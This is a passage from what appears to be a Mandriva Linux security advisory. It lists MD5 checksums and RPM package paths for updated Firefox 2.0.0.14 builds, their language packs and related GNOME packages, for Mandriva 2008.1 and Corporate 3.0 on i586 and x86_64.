2008.1/i586/mozilla-firefox-ru-2.0.0.14-1mdv2008.1.i586.rpm bccbe634dd647634173a0ed2e25dac84 2008.1/i586/mozilla-firefox-sk-2.0.0.14-1mdv2008.1.i586.rpm 6dee9c922771f8ec9764913c8757c936 2008.1/i586/mozilla-firefox-sl-2.0.0.14-1mdv2008.1.i586.rpm 84300ba1efd7083d6ee75f2a74a59e33 2008.1/i586/mozilla-firefox-sv_SE-2.0.0.14-1mdv2008.1.i586.rpm 301370fb9bbbb86639055fab37ecf1bd 2008.1/i586/mozilla-firefox-theme-gnome-2.0.0-5.1mdv2008.1.i586.rpm a9b202274b7f38cb8001ee5818ca9003 2008.1/i586/mozilla-firefox-theme-kdeff-0.4-5.1mdv2008.1.i586.rpm 58c163f14e5586631c97d3ccd57139f5 2008.1/i586/mozilla-firefox-tr-2.0.0.14-1mdv2008.1.i586.rpm e8afa72dc29d2db7245cc6dc66230770 2008.1/i586/mozilla-firefox-uk-2.0.0.14-1mdv2008.1.i586.rpm 6eada4c33416ce4590df8ee875bcebd1 2008.1/i586/mozilla-firefox-zh_CN-2.0.0.14-1mdv2008.1.i586.rpm 7e4eed64e09d8366645486ed9d8fa481 2008.1/i586/mozilla-firefox-zh_TW-2.0.0.14-1mdv2008.1.i586.rpm 0654d6802ae8cbf6aabd3d7b6508d93b 2008.1/i586/totem-2.22.0-4.1mdv2008.1.i586.rpm b3d22d8e96279de417a1527c441af58b 2008.1/i586/totem-common-2.22.0-4.1mdv2008.1.i586.rpm 79f1dd96b613e243d08a2690bada3b76 2008.1/i586/totem-gstreamer-2.22.0-4.1mdv2008.1.i586.rpm 9e00f8b26de3e99395141cfffbad9471 2008.1/i586/totem-mozilla-2.22.0-4.1mdv2008.1.i586.rpm b2e6a534a48776eab424c84b7055084d 2008.1/i586/totem-mozilla-gstreamer-2.22.0-4.1mdv2008.1.i586.rpm 79b5587875de38c642c3e1635b92dd7d 2008.1/i586/yelp-2.22.0-2.1mdv2008.1.i586.rpm 8c2d47ef373061f26f552b15320a4f8a 2008.1/SRPMS/devhelp-0.19-3.1mdv2008.1.src.rpm 0bf1363a37ff5ca970ffdec352a00b1d 2008.1/SRPMS/epiphany-2.22.0-4.1mdv2008.1.src.rpm adc7622ebd48b3ee522cae8939ce36b1 2008.1/SRPMS/galeon-2.0.4-3.1mdv2008.1.src.rpm b3f9483a2afd0dc53246ce6f8fdb2391 2008.1/SRPMS/gecko-sharp2-0.12-5.1mdv2008.1.src.rpm 564ca9c78f747a7d9dff419a7e80906a 2008.1/SRPMS/gluezilla-1.2.6.1-2.1mdv2008.1.src.rpm fd56f636b0f40784ce27468955e8d385 2008.1/SRPMS/gnome-python-extras-2.19.1-10.1mdv2008.1.src.rpm 9f6b19c97a0b31b6e0f4bf78192e96da 2008.1/SRPMS/mozilla-firefox-2.0.0.14-3.1mdv2008.1.src.rpm 0c76035da0b01453a5076631a97005d1 2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.1.src.rpm 11f921487be548e2b7820a183e23cab5 2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.1.src.rpm 5b0c18e60e2f8a6b2efa1a5746241474 2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.1-1mdv2008.1.src.rpm 2e525f346e8759ec4d918a3ed501fcc7 2008.1/SRPMS/mozilla-firefox-l10n-2.0.0.14-1mdv2008.1.src.rpm 41fc4f99f3c75d792d623807cf8d8512 2008.1/SRPMS/mozilla-firefox-theme-gnome-2.0.0-5.1mdv2008.1.src.rpm dab6d83bfdfa22ae0e9fa98b46f3be44 2008.1/SRPMS/mozilla-firefox-theme-kdeff-0.4-5.1mdv2008.1.src.rpm eee983c2940406b0dd8f86081dc7e954 2008.1/SRPMS/totem-2.22.0-4.1mdv2008.1.src.rpm 78c879f5aeb2af3d561e1f3cda3f9a32 2008.1/SRPMS/yelp-2.22.0-2.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: ba2060681e02c885b9201f2717bceb2a 2008.1/x86_64/devhelp-0.19-3.1mdv2008.1.x86_64.rpm c6611d4aee254ce722e93739b2b2979f 2008.1/x86_64/devhelp-plugins-0.19-3.1mdv2008.1.x86_64.rpm 6a6b212d1118dd62d0639635c1a6ec3c 2008.1/x86_64/epiphany-2.22.0-4.1mdv2008.1.x86_64.rpm b8e04bcbf5d68b524424d666f5ecee12 2008.1/x86_64/epiphany-devel-2.22.0-4.1mdv2008.1.x86_64.rpm 47eaa850664013f1d64ecb44b3bed3d0 2008.1/x86_64/galeon-2.0.4-3.1mdv2008.1.x86_64.rpm 4beefc1fcd1e86e4eec7500b22c58e51 2008.1/x86_64/gnome-python-extras-2.19.1-10.1mdv2008.1.x86_64.rpm ffc9b7c95e7afca356ff7dcad024d57c 2008.1/x86_64/gnome-python-gda-2.19.1-10.1mdv2008.1.x86_64.rpm 828358425d654135a4b0197a06989faa 2008.1/x86_64/gnome-python-gda-devel-2.19.1-10.1mdv2008.1.x86_64.rpm 98504130f2e0318e17d9ccebb825eb0e 2008.1/x86_64/gnome-python-gdl-2.19.1-10.1mdv2008.1.x86_64.rpm 1a2a0d1b1a66bf42e9a554b4a8de449f 2008.1/x86_64/gnome-python-gksu-2.19.1-10.1mdv2008.1.x86_64.rpm 250bea58343dfc38db2f413c97e72948 2008.1/x86_64/gnome-python-gtkhtml2-2.19.1-10.1mdv2008.1.x86_64.rpm ddff335f1ec6db7c904eae02ad611e5d 2008.1/x86_64/gnome-python-gtkmozembed-2.19.1-10.1mdv2008.1.x86_64.rpm 5168c1a9304e1eac88bd48d3c7e3acba 2008.1/x86_64/gnome-python-gtkspell-2.19.1-10.1mdv2008.1.x86_64.rpm 887f662afb28f812a6844d6461a54173 2008.1/x86_64/lib64devhelp-1_0-0.19-3.1mdv2008.1.x86_64.rpm 64d31bb045d1a4bec3d933509514e764 2008.1/x86_64/lib64devhelp-1-devel-0.19-3.1mdv2008.1.x86_64.rpm 89aa998063c62863fbb75c08c354b29e 2008.1/x86_64/lib64gluezilla0-1.2.6.1-2.1mdv2008.1.x86_64.rpm f2fce5e7e14fb1f7a2afec77b03b36c0 2008.1/x86_64/lib64mozilla-firefox2.0.0.14-2.0.0.14-3.1mdv2008.1.x86_64.rpm 7026d9e6b5d9e349bcaa6b1901fb2522 2008.1/x86_64/lib64mozilla-firefox-devel-2.0.0.14-3.1mdv2008.1.x86_64.rpm b23e70cee5fa005beff8931d3236d6ae 2008.1/x86_64/mozilla-firefox-2.0.0.14-3.1mdv2008.1.x86_64.rpm f9c76108c8ef9c3c2598a253bc1e37ec 2008.1/x86_64/mozilla-firefox-af-2.0.0.14-1mdv2008.1.x86_64.rpm e447e2cd0571dc2a6fc4f6094eebc6b8 2008.1/x86_64/mozilla-firefox-ar-2.0.0.14-1mdv2008.1.x86_64.rpm bf1b2f614b002f8f94676260540ac6a1 2008.1/x86_64/mozilla-firefox-be-2.0.0.14-1mdv2008.1.x86_64.rpm 008d435d912a7ae51c9eec1b2bfb26f4 2008.1/x86_64/mozilla-firefox-bg-2.0.0.14-1mdv2008.1.x86_64.rpm e43f1f17fca33a4fcdb4849c3eab8fc9 2008.1/x86_64/mozilla-firefox-br_FR-2.0.0.14-1mdv2008.1.x86_64.rpm 229f90a4d453967dcb9be0018b082d21 2008.1/x86_64/mozilla-firefox-ca-2.0.0.14-1mdv2008.1.x86_64.rpm c1258d394b7356d12a9c16d78ba8c630 2008.1/x86_64/mozilla-firefox-cs-2.0.0.14-1mdv2008.1.x86_64.rpm 196b12d032eb376df228d198109adbf4 2008.1/x86_64/mozilla-firefox-da-2.0.0.14-1mdv2008.1.x86_64.rpm 9d1b30749e1b0e1101b7471bc591c178 2008.1/x86_64/mozilla-firefox-de-2.0.0.14-1mdv2008.1.x86_64.rpm dc4d0707e9cd1bfd8384cf111ca88ef8 2008.1/x86_64/mozilla-firefox-el-2.0.0.14-1mdv2008.1.x86_64.rpm 297206283ab8e2ba9e969546810e6204 2008.1/x86_64/mozilla-firefox-en_GB-2.0.0.14-1mdv2008.1.x86_64.rpm 8be2d1a70020c55d10c6edd9addb642d 2008.1/x86_64/mozilla-firefox-es_AR-2.0.0.14-1mdv2008.1.x86_64.rpm 74ebcb17dfc3885d4afeaf7fcccdd914 2008.1/x86_64/mozilla-firefox-es_ES-2.0.0.14-1mdv2008.1.x86_64.rpm 9d2998cc17e610693bd627feb9ac8e8a 2008.1/x86_64/mozilla-firefox-et_EE-2.0.0.14-1mdv2008.1.x86_64.rpm 6ffd8c6f5feb1ffd24ff8c022bc7e836 2008.1/x86_64/mozilla-firefox-eu-2.0.0.14-1mdv2008.1.x86_64.rpm 9458cac41407a69c978ae46f2bc2a45a 2008.1/x86_64/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.1.x86_64.rpm d8d9f541b124dd75ba964bdf4b5987ab 2008.1/x86_64/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.1.x86_64.rpm 4adb57157c8c043e999a1e51dee0e292 2008.1/x86_64/mozilla-firefox-ext-scribefire-2.1-1mdv2008.1.x86_64.rpm 642fbe2fffdbd27db190c242e29c4903 2008.1/x86_64/mozilla-firefox-fi-2.0.0.14-1mdv2008.1.x86_64.rpm 0d6b80db248f3c991f276c29eb747b62 2008.1/x86_64/mozilla-firefox-fr-2.0.0.14-1mdv2008.1.x86_64.rpm b62280466d5d724ac3dfe53fa4b48c90 2008.1/x86_64/mozilla-firefox-fy-2.0.0.14-1mdv2008.1.x86_64.rpm 13afb221b568bb4ea7bd399f73da49b4 2008.1/x86_64/mozilla-firefox-ga-2.0.0.14-1mdv2008.1.x86_64.rpm 9fcd9e0ac77721696b18c2075db6e239 2008.1/x86_64/mozilla-firefox-gnome-support-2.0.0.14-3.1mdv2008.1.x86_64.rpm 2c031156ee91486d14b8ea4d70902fd8 2008.1/x86_64/mozilla-firefox-gu_IN-2.0.0.14-1mdv2008.1.x86_64.rpm 7192f60d62d226023d862b2fc11cb8ba 2008.1/x86_64/mozilla-firefox-he-2.0.0.14-1mdv2008.1.x86_64.rpm 534c37226cc60bff8a995e15514aef02 2008.1/x86_64/mozilla-firefox-hu-2.0.0.14-1mdv2008.1.x86_64.rpm c919b44503d228cb73ae64390d331e67 2008.1/x86_64/mozilla-firefox-it-2.0.0.14-1mdv2008.1.x86_64.rpm 48b9d93a9ff5a2fd2719b41280f86427 2008.1/x86_64/mozilla-firefox-ja-2.0.0.14-1mdv2008.1.x86_64.rpm e1c9592ed80c7db0f0ec7d46a34c1697 2008.1/x86_64/mozilla-firefox-ka-2.0.0.14-1mdv2008.1.x86_64.rpm 81ddfa69e576dedb2860670063f6ea60 2008.1/x86_64/mozilla-firefox-ko-2.0.0.14-1mdv2008.1.x86_64.rpm d4ce3cad03b3e8ddfcbef29045821eec 2008.1/x86_64/mozilla-firefox-ku-2.0.0.14-1mdv2008.1.x86_64.rpm 83b4494413194bd967fe9b65ccfd0274 2008.1/x86_64/mozilla-firefox-lt-2.0.0.14-1mdv2008.1.x86_64.rpm e054241e9b37808681688c60bc989238 2008.1/x86_64/mozilla-firefox-mk-2.0.0.14-1mdv2008.1.x86_64.rpm e4cd09c81a56ab0f030557f52b5496b8 2008.1/x86_64/mozilla-firefox-mn-2.0.0.14-1mdv2008.1.x86_64.rpm fa337c01305ce532e04ce96436300db3 2008.1/x86_64/mozilla-firefox-nb_NO-2.0.0.14-1mdv2008.1.x86_64.rpm d81560ff176ec3323369731c7924bc62 2008.1/x86_64/mozilla-firefox-nl-2.0.0.14-1mdv2008.1.x86_64.rpm 172158a25c4f965797938bc416aefead 2008.1/x86_64/mozilla-firefox-nn_NO-2.0.0.14-1mdv2008.1.x86_64.rpm f715279133f1bdf0a01370306febde1b 2008.1/x86_64/mozilla-firefox-pa_IN-2.0.0.14-1mdv2008.1.x86_64.rpm d2e38267dd4bdc273ae0ad0e294e73f6 2008.1/x86_64/mozilla-firefox-pl-2.0.0.14-1mdv2008.1.x86_64.rpm 619cb17be15f883f504c0618061086eb 2008.1/x86_64/mozilla-firefox-pt_BR-2.0.0.14-1mdv2008.1.x86_64.rpm 79718762aac5ffb41e1d0bca94a14a68 2008.1/x86_64/mozilla-firefox-pt_PT-2.0.0.14-1mdv2008.1.x86_64.rpm 7718a17a821568398189c188d91d9ce6 2008.1/x86_64/mozilla-firefox-ro-2.0.0.14-1mdv2008.1.x86_64.rpm 7fe9468e8a7c2b45d5e7ad3c3aa7fa7b 2008.1/x86_64/mozilla-firefox-ru-2.0.0.14-1mdv2008.1.x86_64.rpm f3ce7ace15da74af24b08939eaaad14c 2008.1/x86_64/mozilla-firefox-sk-2.0.0.14-1mdv2008.1.x86_64.rpm 3de7f9ab8cbf4fabf8c42959dee87a8e 2008.1/x86_64/mozilla-firefox-sl-2.0.0.14-1mdv2008.1.x86_64.rpm 81682eb944490868f80425683cd81fd9 2008.1/x86_64/mozilla-firefox-sv_SE-2.0.0.14-1mdv2008.1.x86_64.rpm ae8a034bfd475e94cc0d95f32403fb4b 2008.1/x86_64/mozilla-firefox-theme-gnome-2.0.0-5.1mdv2008.1.x86_64.rpm 6dafbd76ca33078a31938d38e602646b 2008.1/x86_64/mozilla-firefox-theme-kdeff-0.4-5.1mdv2008.1.x86_64.rpm 7b63fa835a14099352ebbb0c1a65686c 2008.1/x86_64/mozilla-firefox-tr-2.0.0.14-1mdv2008.1.x86_64.rpm 966dc63e329c20634e69da185719bdf7 2008.1/x86_64/mozilla-firefox-uk-2.0.0.14-1mdv2008.1.x86_64.rpm c204579cbf17957bc8443b3687c3f25d 2008.1/x86_64/mozilla-firefox-zh_CN-2.0.0.14-1mdv2008.1.x86_64.rpm e28dbbb49f6b0afb16b928f3ca7e8526 2008.1/x86_64/mozilla-firefox-zh_TW-2.0.0.14-1mdv2008.1.x86_64.rpm 5cb2eefa73fa647b28f909023ad445f4 2008.1/x86_64/totem-2.22.0-4.1mdv2008.1.x86_64.rpm d01443cd5675bee2c5b5be61019f387d 2008.1/x86_64/totem-common-2.22.0-4.1mdv2008.1.x86_64.rpm 211dac94455098f9f1785bca66055f1b 2008.1/x86_64/totem-gstreamer-2.22.0-4.1mdv2008.1.x86_64.rpm 02a01af0f0efc51841f4ed957f7308ad 2008.1/x86_64/totem-mozilla-2.22.0-4.1mdv2008.1.x86_64.rpm 157c55615a9c99dee84ea12d4a584c86 2008.1/x86_64/totem-mozilla-gstreamer-2.22.0-4.1mdv2008.1.x86_64.rpm 65fff0e2c446e309e2bacde9941770d5 2008.1/x86_64/yelp-2.22.0-2.1mdv2008.1.x86_64.rpm 8c2d47ef373061f26f552b15320a4f8a 2008.1/SRPMS/devhelp-0.19-3.1mdv2008.1.src.rpm 0bf1363a37ff5ca970ffdec352a00b1d 2008.1/SRPMS/epiphany-2.22.0-4.1mdv2008.1.src.rpm adc7622ebd48b3ee522cae8939ce36b1 2008.1/SRPMS/galeon-2.0.4-3.1mdv2008.1.src.rpm b3f9483a2afd0dc53246ce6f8fdb2391 2008.1/SRPMS/gecko-sharp2-0.12-5.1mdv2008.1.src.rpm 564ca9c78f747a7d9dff419a7e80906a 2008.1/SRPMS/gluezilla-1.2.6.1-2.1mdv2008.1.src.rpm fd56f636b0f40784ce27468955e8d385 2008.1/SRPMS/gnome-python-extras-2.19.1-10.1mdv2008.1.src.rpm 9f6b19c97a0b31b6e0f4bf78192e96da 2008.1/SRPMS/mozilla-firefox-2.0.0.14-3.1mdv2008.1.src.rpm 0c76035da0b01453a5076631a97005d1 2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.1.src.rpm 11f921487be548e2b7820a183e23cab5 2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.1.src.rpm 5b0c18e60e2f8a6b2efa1a5746241474 2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.1-1mdv2008.1.src.rpm 2e525f346e8759ec4d918a3ed501fcc7 2008.1/SRPMS/mozilla-firefox-l10n-2.0.0.14-1mdv2008.1.src.rpm 41fc4f99f3c75d792d623807cf8d8512 2008.1/SRPMS/mozilla-firefox-theme-gnome-2.0.0-5.1mdv2008.1.src.rpm dab6d83bfdfa22ae0e9fa98b46f3be44 2008.1/SRPMS/mozilla-firefox-theme-kdeff-0.4-5.1mdv2008.1.src.rpm eee983c2940406b0dd8f86081dc7e954 2008.1/SRPMS/totem-2.22.0-4.1mdv2008.1.src.rpm 78c879f5aeb2af3d561e1f3cda3f9a32 2008.1/SRPMS/yelp-2.22.0-2.1mdv2008.1.src.rpm Corporate 3.0: ed5c0b3256f8aa59c2884273ccc6e296 corporate/3.0/i586/libnspr4-2.0.0.14-2.1.C30mdk.i586.rpm 41e30bbbc77c83d4fffc2f0fc423a4e1 corporate/3.0/i586/libnspr4-devel-2.0.0.14-2.1.C30mdk.i586.rpm e5ca01daa2a5736c8e0f52c068dfc606 corporate/3.0/i586/libnspr4-static-devel-2.0.0.14-2.1.C30mdk.i586.rpm 000d497b77289543e5df061baa97c8c8 corporate/3.0/i586/libnss3-2.0.0.14-2.1.C30mdk.i586.rpm 740ce3640fed4349ab3caa93baf83107 corporate/3.0/i586/libnss3-devel-2.0.0.14-2.1.C30mdk.i586.rpm f453fc268284cb0ac7bfd391a00eea66 corporate/3.0/i586/mozilla-firefox-2.0.0.14-2.1.C30mdk.i586.rpm e76c0cdfb14cff039e13d243a1e9e344 corporate/3.0/i586/mozilla-firefox-ar-2.0.0.14-0.1.C30mdk.i586.rpm deb0b0eaeddec131f81b08fc23363269 corporate/3.0/i586/mozilla-firefox-bg-2.0.0.14-0.1.C30mdk.i586.rpm 7336fdf7848cafc18ec8ffd20ec00afc corporate/3.0/i586/mozilla-firefox-br-2.0.0.14-0.1.C30mdk.i586.rpm 0ea88e63987773f54065f09e1ffd80bb corporate/3.0/i586/mozilla-firefox-ca-2.0.0.14-0.1.C30mdk.i586.rpm 4f31c39cd333759ad58faf46ae390638 corporate/3.0/i586/mozilla-firefox-cs-2.0.0.14-0.1.C30mdk.i586.rpm 97ccee5f6a194f688ad2666516f215d1 corporate/3.0/i586/mozilla-firefox-da-2.0.0.14-0.1.C30mdk.i586.rpm bc79129174dcbade5dcd28bb8f1fbc96 corporate/3.0/i586/mozilla-firefox-de-2.0.0.14-0.1.C30mdk.i586.rpm e6e98e3e54baa22497a847d64da122cb corporate/3.0/i586/mozilla-firefox-devel-2.0.0.14-2.1.C30mdk.i586.rpm 25f55a4b2487daf3688b84004e4c240e corporate/3.0/i586/mozilla-firefox-el-2.0.0.14-0.1.C30mdk.i586.rpm 5e8aa67d56a19455c4f42d95a0971d5e corporate/3.0/i586/mozilla-firefox-es-2.0.0.14-0.1.C30mdk.i586.rpm e7c49e182ffab8d29685f0e7e3dc8299 corporate/3.0/i586/mozilla-firefox-es_AR-2.0.0.14-0.1.C30mdk.i586.rpm 60b8556fe4dd9ad52c9b97dde5b1781c corporate/3.0/i586/mozilla-firefox-eu-2.0.0.14-0.1.C30mdk.i586.rpm 5f574ab3a397f1b514651ae8192b7920 corporate/3.0/i586/mozilla-firefox-fi-2.0.0.14-0.1.C30mdk.i586.rpm 1c0d8994361426cdce5a510309519ee4 corporate/3.0/i586/mozilla-firefox-fr-2.0.0.14-0.1.C30mdk.i586.rpm 4a295bd7e42e35a563bc8e369c17d413 corporate/3.0/i586/mozilla-firefox-fy-2.0.0.14-0.1.C30mdk.i586.rpm fd8e45509454272dadceffc5b5a952e6 corporate/3.0/i586/mozilla-firefox-ga-2.0.0.14-0.1.C30mdk.i586.rpm 2ade2608c15ffe40402f6335a32b19b4 corporate/3.0/i586/mozilla-firefox-gu_IN-2.0.0.14-0.1.C30mdk.i586.rpm 5f894ef9304a510a67c50f37b021ccf2 corporate/3.0/i586/mozilla-firefox-he-2.0.0.14-0.1.C30mdk.i586.rpm 075bccc8c3d44812f33a5ca6c81be17a corporate/3.0/i586/mozilla-firefox-hu-2.0.0.14-0.1.C30mdk.i586.rpm 45f03049df59f7c493806ce43aac3538 corporate/3.0/i586/mozilla-firefox-it-2.0.0.14-0.1.C30mdk.i586.rpm ba5c6369965f483bd1430f27e5cfdf02 corporate/3.0/i586/mozilla-firefox-ja-2.0.0.14-0.1.C30mdk.i586.rpm 83bd46c0d08098c15647305e481f3644 corporate/3.0/i586/mozilla-firefox-ko-2.0.0.14-0.1.C30mdk.i586.rpm 29c67043fe0d0a80b7d0d55113344eaa corporate/3.0/i586/mozilla-firefox-lt-2.0.0.14-0.1.C30mdk.i586.rpm 3c6680410ceee7bcf32bc047ccb44d58 corporate/3.0/i586/mozilla-firefox-mk-2.0.0.14-0.1.C30mdk.i586.rpm ecee37e384895232e6cb4ea28bf33a76 corporate/3.0/i586/mozilla-firefox-nb-2.0.0.14-0.1.C30mdk.i586.rpm 93c7df335e1cb310eb8410e5e68e0c45 corporate/3.0/i586/mozilla-firefox-nl-2.0.0.14-0.1.C30mdk.i586.rpm 17e5c154bf8e17817f671fcbeb49be3a corporate/3.0/i586/mozilla-firefox-pa_IN-2.0.0.14-0.1.C30mdk.i586.rpm ec33386fec9ac32e77982f06554965b2 corporate/3.0/i586/mozilla-firefox-pl-2.0.0.14-0.1.C30mdk.i586.rpm 82f2b9f8c1fc1236c8f4a71bf2b47485 corporate/3.0/i586/mozilla-firefox-pt-2.0.0.14-0.1.C30mdk.i586.rpm 2a23bd734030f8e24eff00bf63d508be corporate/3.0/i586/mozilla-firefox-pt_BR-2.0.0.14-0.1.C30mdk.i586.rpm 7c067be1890b924ed8be2ff727bc1a10 corporate/3.0/i586/mozilla-firefox-ro-2.0.0.14-0.1.C30mdk.i586.rpm ba4a5eb66ea708bb83a5b9d2246199aa corporate/3.0/i586/mozilla-firefox-ru-2.0.0.14-0.1.C30mdk.i586.rpm 13a9c5f036fe6c6e9de2968443e9116b corporate/3.0/i586/mozilla-firefox-sk-2.0.0.14-0.1.C30mdk.i586.rpm 41ae435be88554725cd3936880cbfd0c corporate/3.0/i586/mozilla-firefox-sl-2.0.0.14-0.1.C30mdk.i586.rpm ce34f805eb4b8f7478a7100f91634015 corporate/3.0/i586/mozilla-firefox-sv-2.0.0.14-0.1.C30mdk.i586.rpm 7ae04e9e1f24c4986728dcac63a15a9a corporate/3.0/i586/mozilla-firefox-tr-2.0.0.14-0.1.C30mdk.i586.rpm 08d6761dfe829462985fed2ce9c77680 corporate/3.0/i586/mozilla-firefox-uk-2.0.0.14-0.1.C30mdk.i586.rpm ac22e8a45f115d99ca9cd7f3a9a90d81 corporate/3.0/i586/mozilla-firefox-zh_CN-2.0.0.14-0.1.C30mdk.i586.rpm b7a6ab0f16a438296d9c6109416e3f36 corporate/3.0/i586/mozilla-firefox-zh_TW-2.0.0.14-0.1.C30mdk.i586.rpm 59138f10cac284225496768d6b5ff668 corporate/3.0/SRPMS/mozilla-firefox-2.0.0.14-2.1.C30mdk.src.rpm 6b071c373a4df0606ce03f484b4ae4a5 corporate/3.0/SRPMS/mozilla-firefox-l10n-2.0.0.14-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: bb478accda71d65c0ac6f5389999f2b2 corporate/3.0/x86_64/lib64nspr4-2.0.0.14-2.1.C30mdk.x86_64.rpm 259b9b6e1fa9a35abebb0ac4d6f832f3 corporate/3.0/x86_64/lib64nspr4-devel-2.0.0.14-2.1.C30mdk.x86_64.rpm 8bab1b61f5983f7b7915583d0120ccfe corporate/3.0/x86_64/lib64nspr4-static-devel-2.0.0.14-2.1.C30mdk.x86_64.rpm 6f9ce0b83da04326e95416944565fdb7 corporate/3.0/x86_64/lib64nss3-2.0.0.14-2.1.C30mdk.x86_64.rpm 70ba59b2b15b4086d8d01802c11b595c corporate/3.0/x86_64/lib64nss3-devel-2.0.0.14-2.1.C30mdk.x86_64.rpm b5c7e84680470775b946e605889bf9c5 corporate/3.0/x86_64/mozilla-firefox-2.0.0.14-2.1.C30mdk.x86_64.rpm 6ffdef2784e52d172d68879d177a92f5 corporate/3.0/x86_64/mozilla-firefox-ar-2.0.0.14-0.1.C30mdk.x86_64.rpm a9cd335a71b58bf87876878dc77ed32f corporate/3.0/x86_64/mozilla-firefox-bg-2.0.0.14-0.1.C30mdk.x86_64.rpm e86bd4d9654d55ded337a38a0b298bf4 corporate/3.0/x86_64/mozilla-firefox-br-2.0.0.14-0.1.C30mdk.x86_64.rpm 921d49ff07a826c810a4a2b506aae696 corporate/3.0/x86_64/mozilla-firefox-ca-2.0.0.14-0.1.C30mdk.x86_64.rpm f9f4cc7b00dcb32aa2cf0cd1a8e84330 corporate/3.0/x86_64/mozilla-firefox-cs-2.0.0.14-0.1.C30mdk.x86_64.rpm 5e4c3a179bbef52bb881266444664b06 corporate/3.0/x86_64/mozilla-firefox-da-2.0.0.14-0.1.C30mdk.x86_64.rpm 2e5d4bd35208bf8f340763075a128e2d corporate/3.0/x86_64/mozilla-firefox-de-2.0.0.14-0.1.C30mdk.x86_64.rpm 3bc0322d4eddd69e585e30c293a6ad77 corporate/3.0/x86_64/mozilla-firefox-devel-2.0.0.14-2.1.C30mdk.x86_64.rpm be9b51e01251fd7f0fb60fef2343555b corporate/3.0/x86_64/mozilla-firefox-el-2.0.0.14-0.1.C30mdk.x86_64.rpm 7cbc7a0145b5223f79fd54ba3aabcc79 corporate/3.0/x86_64/mozilla-firefox-es-2.0.0.14-0.1.C30mdk.x86_64.rpm e5b2cbbd77112dbd78cb44c323319bc8 corporate/3.0/x86_64/mozilla-firefox-es_AR-2.0.0.14-0.1.C30mdk.x86_64.rpm 42b3e340d6c60aa7ab5f78d34b7b0a62 corporate/3.0/x86_64/mozilla-firefox-eu-2.0.0.14-0.1.C30mdk.x86_64.rpm 43d7e9d4e6fe9a392f8f9f2534fb38b6 corporate/3.0/x86_64/mozilla-firefox-fi-2.0.0.14-0.1.C30mdk.x86_64.rpm f9c127e8e7d638125870aeb26e903efb corporate/3.0/x86_64/mozilla-firefox-fr-2.0.0.14-0.1.C30mdk.x86_64.rpm bba665b026527ba9c028e6b1f6e21345 corporate/3.0/x86_64/mozilla-firefox-fy-2.0.0.14-0.1.C30mdk.x86_64.rpm 9bb26ead3ef4647d50e026c8059d141e corporate/3.0/x86_64/mozilla-firefox-ga-2.0.0.14-0.1.C30mdk.x86_64.rpm d0a33dfe35e0b04416c3a2a30b7813a0 corporate/3.0/x86_64/mozilla-firefox-gu_IN-2.0.0.14-0.1.C30mdk.x86_64.rpm 3d4124ea06253fb43061ff4d415e130e corporate/3.0/x86_64/mozilla-firefox-he-2.0.0.14-0.1.C30mdk.x86_64.rpm 031f42a92efb6cb6fa7f9dc6d01b1a56 corporate/3.0/x86_64/mozilla-firefox-hu-2.0.0.14-0.1.C30mdk.x86_64.rpm 74a79728a930e5801ef6d7ea9cdf09cb corporate/3.0/x86_64/mozilla-firefox-it-2.0.0.14-0.1.C30mdk.x86_64.rpm c4dfcafb035f790093f8e724630bb11b corporate/3.0/x86_64/mozilla-firefox-ja-2.0.0.14-0.1.C30mdk.x86_64.rpm ce286aaf8471542aab16fd9a655820ad corporate/3.0/x86_64/mozilla-firefox-ko-2.0.0.14-0.1.C30mdk.x86_64.rpm 0deb75093a2c2a67744ea958994ad720 corporate/3.0/x86_64/mozilla-firefox-lt-2.0.0.14-0.1.C30mdk.x86_64.rpm c53f83cef64a4d617cd480fe8521aca0 corporate/3.0/x86_64/mozilla-firefox-mk-2.0.0.14-0.1.C30mdk.x86_64.rpm 1950d044d41c03e2964384374636e0ab corporate/3.0/x86_64/mozilla-firefox-nb-2.0.0.14-0.1.C30mdk.x86_64.rpm 7c135e257594aef7b533f50e09aa3348 corporate/3.0/x86_64/mozilla-firefox-nl-2.0.0.14-0.1.C30mdk.x86_64.rpm f16cbdb65610a045cabf3c09d81ee0ee corporate/3.0/x86_64/mozilla-firefox-pa_IN-2.0.0.14-0.1.C30mdk.x86_64.rpm d815513de603c9f52d559b32ac568764 corporate/3.0/x86_64/mozilla-firefox-pl-2.0.0.14-0.1.C30mdk.x86_64.rpm b11d25f864ff36d262e43054d9a6860c corporate/3.0/x86_64/mozilla-firefox-pt-2.0.0.14-0.1.C30mdk.x86_64.rpm 931912295c8152af79c38311f4a121f0 corporate/3.0/x86_64/mozilla-firefox-pt_BR-2.0.0.14-0.1.C30mdk.x86_64.rpm f9fdb67f589438e38a9bda5960a26837 corporate/3.0/x86_64/mozilla-firefox-ro-2.0.0.14-0.1.C30mdk.x86_64.rpm e6af010987a2c0e81320cf3f2706c4ad corporate/3.0/x86_64/mozilla-firefox-ru-2.0.0.14-0.1.C30mdk.x86_64.rpm 321edf73a9ade5648a3a313f5461d8e7 corporate/3.0/x86_64/mozilla-firefox-sk-2.0.0.14-0.1.C30mdk.x86_64.rpm c68aa0dfddc4c4154c50f31ddf0d018a corporate/3.0/x86_64/mozilla-firefox-sl-2.0.0.14-0.1.C30mdk.x86_64.rpm c0724b7ad093690f58d723219d6d9b7d corporate/3.0/x86_64/mozilla-firefox-sv-2.0.0.14-0.1.C30mdk.x86_64.rpm 1634c05480a4eb17f20ce6e71bcff2d4 corporate/3.0/x86_64/mozilla-firefox-tr-2.0.0.14-0.1.C30mdk.x86_64.rpm ecd436ff0d59978261974d3687a7dc8e corporate/3.0/x86_64/mozilla-firefox-uk-2.0.0.14-0.1.C30mdk.x86_64.rpm 12acc5ab29ac8ee9fba10c81c5c65d5d corporate/3.0/x86_64/mozilla-firefox-zh_CN-2.0.0.14-0.1.C30mdk.x86_64.rpm fe39a7e99b49897e112f4f7b9090eda0 corporate/3.0/x86_64/mozilla-firefox-zh_TW-2.0.0.14-0.1.C30mdk.x86_64.rpm 59138f10cac284225496768d6b5ff668 